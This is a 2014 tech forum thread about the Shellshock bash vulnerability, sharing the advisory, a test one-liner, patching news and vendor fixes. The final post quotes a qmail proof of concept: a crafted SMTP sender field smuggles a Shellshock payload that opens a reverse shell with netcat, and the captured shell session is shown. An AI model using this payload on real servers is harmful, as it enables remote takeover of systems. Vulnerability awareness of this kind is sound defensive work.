Geekzone: technology news, blogs, forums
Guest
Welcome Guest.
You haven't logged in yet. If you don't have an account you can register now.




635 posts

Ultimate Geek


# 152414 25-Sep-2014 16:56
Send private message

By now you've probably all heard about CVE-2014-6271:

Overview

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.

http://seclists.org/oss-sec/2014/q3/650 
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271

This affects bash in linux distributions and bash in OS X also appears to be vulnerable.

Test with the following in the shell...

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"


If you get the following output, then the system is vulnerable.

vulnerable
this is a test



More info:
http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/

But things might be worse than it appears, as the latest patches do not appear to cover all cases of string processing in bash, so there might be additional exploits to come.
https://news.ycombinator.com/item?id=8365158




#include <standard.disclaimer>


Create new topic


635 posts

Ultimate Geek


  # 1137644 25-Sep-2014 17:02
Send private message

For some reason my formatting is messed up. (fixed).




#include <standard.disclaimer>


 
 
 
 


'That VDSL Cat'
11030 posts

Uber Geek

Trusted
Spark
Subscriber

  # 1137780 25-Sep-2014 19:57
Send private message

hm. didnt hear about this till seeing the post..

i see what im going to be doing over the next few days....





#include <std_disclaimer>

 

Any comments made are personal opinion and do not reflect directly on the position my current or past employers may have.


2541 posts

Uber Geek


  # 1137783 25-Sep-2014 20:09
Send private message

Spent a chunk of the day patching for it, woohoo.

19282 posts

Uber Geek
Inactive user


  # 1137787 25-Sep-2014 20:21
Send private message

Dam not good :(

gzt

10909 posts

Uber Geek


  # 1138283 26-Sep-2014 14:46
Send private message

Imo redhat's security summary and related blog post provide the best clarity on the issue. Clearly it needs to be fixed but not every system will be vulnerable in practice. Depends on exposed surfaces.

 
 
 
 




635 posts

Ultimate Geek


  # 1142857 27-Sep-2014 22:54
Send private message

gzt: Imo redhat's security summary and related blog post provide the best clarity on the issue. Clearly it needs to be fixed but not every system will be vulnerable in practice. Depends on exposed surfaces.


The Red Hat summary is one of the better ones, but this is another good one that tracks the different issues and includes a website tester.
https://shellshocker.net/

Please note the warning: Do not test against websites that you do not have permission to test against.




#include <standard.disclaimer>


2394 posts

Uber Geek

Trusted
Subscriber

  # 1142858 27-Sep-2014 23:06
One person supports this post
Send private message

I'm amazed this hasn't had as much media attention as Heartbleed, I mean this one is a real rip-snorter of a bug.

3439 posts

Uber Geek

Trusted
Lifetime subscriber

  # 1142873 28-Sep-2014 07:33
One person supports this post
Send private message

insane: I'm amazed this hasn't had as much media attention as Heartbleed, I mean this one is a real rip-snorter of a bug.

Two reasons:
1. It's nix based so the media doesn't have a clue how many and what type of systems could be affected.
2. OS X remains well within the RDF.

2091 posts

Uber Geek


  # 1142882 28-Sep-2014 09:27
Send private message

Yeah they screwed up reporting heartbleed - I shudder to think how they would report on this.

We've tackled it at the edge with checkpoint IPS and Netscaler responder policies.

425 posts

Ultimate Geek

Subscriber

  # 1142919 28-Sep-2014 11:48
Send private message

QNAP have now issued an update to firmware 4.1.1 (build 0927) to address this vulnerability.

Release notes:

 

2014-09-27

 

4.1.1 build 0927

 

 

[QTS 4.1.1 Build 0927]

[Bug Fixes]
 - Fixed the Shellshock security vulnerability that could allow attackers to gain remote control over the system (CVE-2014-6271).

 


BDFL - Memuneh
64667 posts

Uber Geek

Administrator
Trusted
Geekzone
Lifetime subscriber

  # 1142986 28-Sep-2014 14:18
Send private message

And if you think ONLY web servers are vulnerable... Think again: qmail is a vector for CVE-2014-6271 (bash "shellshock").


As has already been said, upgrade your bash now!

The preconditions for this attack to work are:

1) "Shellshock"-vulnerable bash
2) /bin/sh symlinked to bash
3) Email delivery via qmail to a valid user with a .qmail file containing
ANY program delivery (the actual program being delivered to is irrelevant)

Example:

======

(terminal 0)

$ nc -l -p 7777

(terminal 1)

$ pwd
/home/kgeorge
$ cat .qmail
|/bin/cat
$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 mail.example.com ESMTP
ehlo me
250-mail.example.com
250-PIPELINING
250 8BITMIME
mail from:<() { :; }; nc -e /bin/bash localhost 7777>
250 ok
rcpt to:<kgeorge [at] example>
250 ok
data
354 go ahead
Subject: Vuln

.
250 ok 1411674782 qp 4151

(terminal 0)

$ nc -l -p 7777
ls
mail
whoami
kgeorge





Create new topic



Twitter and LinkedIn »



Follow us to receive Twitter updates when new discussions are posted in our forums:



Follow us to receive Twitter updates when news items and blogs are posted in our frontpage:



Follow us to receive Twitter updates when tech item prices are listed in our price comparison site:





News »

Microsoft New Zealand Partner Awards results
Posted 18-Oct-2019 10:18


Logitech introduces new Made for Google keyboard and mouse devices
Posted 16-Oct-2019 13:36


MATTR launches to accelerate decentralised identity
Posted 16-Oct-2019 10:28


Vodafone X-Squad powers up for customers
Posted 16-Oct-2019 08:15


D Link ANZ launches EXO Smart Mesh Wi Fi Routers with McAfee protection
Posted 15-Oct-2019 11:31


Major Japanese retailer partners with smart New Zealand technology IMAGR
Posted 14-Oct-2019 10:29


Ola pioneers one-time passcode feature to fight rideshare fraud
Posted 14-Oct-2019 10:24


Spark Sport new home of NZC matches from 2020
Posted 10-Oct-2019 09:59


Meet Nola, Noel Leeming's new digital employee
Posted 4-Oct-2019 08:07


Registrations for Sprout Accelerator open for 2020 season
Posted 4-Oct-2019 08:02


Teletrac Navman welcomes AI tech leader Jens Meggers as new President
Posted 4-Oct-2019 07:41


Vodafone makes voice of 4G (VoLTE) official
Posted 4-Oct-2019 07:36


2degrees Reaches Milestone of 100,000 Broadband Customers
Posted 1-Oct-2019 09:17


Nokia 1 Plus available in New Zealand from 2nd October
Posted 30-Sep-2019 17:46


Ola integrates Apple Pay as payment method in New Zealand
Posted 25-Sep-2019 09:51



Geekzone Live »

Try automatic live updates from Geekzone directly in your browser, without refreshing the page, with Geekzone Live now.


Support Geekzone »

Our community of supporters help make Geekzone possible. Click the button below to join them.

Support Geezone on PressPatron



Are you subscribed to our RSS feed? You can download the latest headlines and summaries from our stories directly to your computer or smartphone by using a feed reader.

Alternatively, you can receive a daily email with Geekzone updates.